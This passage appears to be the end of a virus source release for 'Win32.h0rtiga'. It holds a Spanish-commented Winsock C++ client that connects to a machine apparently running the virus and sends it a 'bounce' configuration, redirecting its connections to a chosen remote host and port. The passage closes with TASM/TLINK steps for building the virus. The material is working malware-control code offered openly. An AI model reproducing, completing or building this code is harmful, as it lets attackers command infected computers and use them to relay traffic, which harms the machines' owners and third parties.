void SetEstructura(Conf_Remota *cremota, db acc, dd dire, dw premote) {
cremota->accion = acc;
cremota->direccion = dire;
cremota->puertoremoto = premote;
}
void main(int argc, char *argv[]) {
int s, i;
char banner[MAX_BANNER];
sockaddr_in a;
hostent FAR *h = NULL;
WSADATA wsaData;
Conf_Remota conf_remota;
// Show credits
MostrarCreditos();
// Num params ?
if (argc != 5) {
cout << "Error : Numero de parametros incorrectos.\n\n";
exit(-1);
}
// WinSock up!!
if (WSAStartup (0x101, &wsaData)) {
cout << "Error : Incapaz de inicializar la libreria WinSock.\n\n";
exit(-1);
}
// server's name
if (isalpha((int)*(argv[1]))) {
h = gethostbyname(argv[1]);
if (h == NULL) {
cout << "Error : No se puede hallar el nombre del anfitrion\n\n";
WSACleanup();
exit(-1);
} else memcpy(&(a.sin_addr.s_addr), h->h_addr, sizeof(int));
}
else {
if ((a.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE) {
cout << "Error : No se puede hallar el nombre del anfitrion\n\n";
exit(-1);
}
}
// port ?
a.sin_family = AF_INET;
a.sin_port = htons((dw)atoi(argv[2]));
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s==0) {
cout << "Error : No se puede establecer la conexion\n"
<< WSAGetLastError() << '\n\n';
WSACleanup();
exit(-1);
}
// trying ...
if (connect(s, (struct sockaddr *)&a, sizeof(a))) {
cout << "Error : No se puede establecer la conexion: "
<< WSAGetLastError() << '\n\n';
WSACleanup();
exit(-1);
}
// clean banner
for (i=0;i<MAX_BANNER;i++) banner[i] = 0;
cout << "Esperando respuesta ...\n\n";
if (recv(s, (char *)&banner, sizeof(banner), 0) == SOCKET_ERROR)
cout << "Error recibiendo datos.\n";
else {
cout << banner << "\n";
}
if (isalpha((int)*(argv[3]))) {
h = gethostbyname(argv[3]);
if (h == NULL) {
cout << "Error : No se puede hallar nombre de anfitrion remoto\n\n";
WSACleanup();
exit(-1);
} else memcpy(&(addrtmp), h->h_addr, sizeof(int));
}
else {
if ((addrtmp = inet_addr (argv[3])) == INADDR_NONE) {
cout << "Error : No se puede hallar nombre de anfitrion remoto\n\n";
exit(-1);
}
}
SetEstructura(&conf_remota, ACCION_BOUNCE, addrtmp, htons((dw)atoi(argv[4])));
if ((send (s, (char *)&conf_remota, sizeof(conf_remota), 0)) == SOCKET_ERROR)
cout << "Error enviando datos.\n";
else cout << "... nueva configuracion enviada.\n\n";
closesocket(s);
// WinSock down !!
WSACleanup();
}
;----------------------------------------------------------------------------
; Win32.h0rtiga - end client code (h0rtclient.cpp)
;----------------------------------------------------------------------------
;----------------------------------------------------------------------------
; Win32.h0rtiga - compiling ... (Tasm 5.0/x86)
;----------------------------------------------------------------------------
;
; tasm32 -ml w32h0rtiga.asm
; tlink32 -Tpe -c -x w32h0rtiga.obj ,,, import32
; pewrsec.com w32h0rtiga.exe
;
;
; --] EOF